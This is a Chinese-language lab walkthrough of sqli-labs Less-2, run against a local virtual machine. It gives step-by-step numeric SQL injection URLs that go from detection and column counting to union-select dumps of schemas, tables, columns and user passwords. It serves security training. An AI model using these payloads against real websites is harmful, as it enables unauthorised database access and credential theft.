sqli-labs靶场第二关less-2
本次测试在虚拟机搭建靶场,从主机测试
1、输入?id=1和?id=2发现有不同的页面回显
2、判断注入类型
data:image/s3,"s3://crabby-images/b4c89/b4c89d804475c8c215d144f9fc2a7d109ec788f6" alt=""
从回显判断多一个' ,预测可能是数字型注入
输入
http://192.168.128.3/sq/Less-2/?id=1 and 1=1
http://192.168.128.3/sq/Less-2/?id=1 and 1=2
发现and 1=1 正常回显,and 1=2 回显错误,确定数字型注入
3、确定列数
http://192.168.128.3/sq/Less-2/?id=1 group by 5
data:image/s3,"s3://crabby-images/80289/802893830eab004fa218086c9785e5162159f23c" alt=""
http://192.168.128.3/sq/Less-2/?id=1 group by 4
data:image/s3,"s3://crabby-images/c1c63/c1c6314a524ec3bf48bf76cd5756e66deee23d93" alt=""
http://192.168.128.3/sq/Less-2/?id=1 group by 3
data:image/s3,"s3://crabby-images/d0056/d00565752b6c177bf8a47ca45d812760ed0c4e0a" alt=""
group by 3 的时候回显正常,确定有三列。
4、确定回显位
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,2,3
2.3位为回显位
5、查询数据库名和版本
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,database(),version()
data:image/s3,"s3://crabby-images/ef78e/ef78ea4f830759a69e587acf8cb3154848ff5560" alt=""
6、爆出数据库名
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
data:image/s3,"s3://crabby-images/bb7b4/bb7b4bb7d3c216f41b356b5b3a9052a45f58ab95" alt=""
7、爆出表名
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'
data:image/s3,"s3://crabby-images/85b38/85b380ee0a30f3efd846cff41bf552e7f97c516d" alt=""
8、爆出列名
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'
data:image/s3,"s3://crabby-images/835aa/835aa34c1b34a4168193cc87d458f04e0a63e0f3" alt=""
9、爆出数据
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(username,'~',password),3 from security.users
data:image/s3,"s3://crabby-images/7d00b/7d00b8defc34f5881b2886eac431dd1896f25fb0" alt=""
** 大功告成**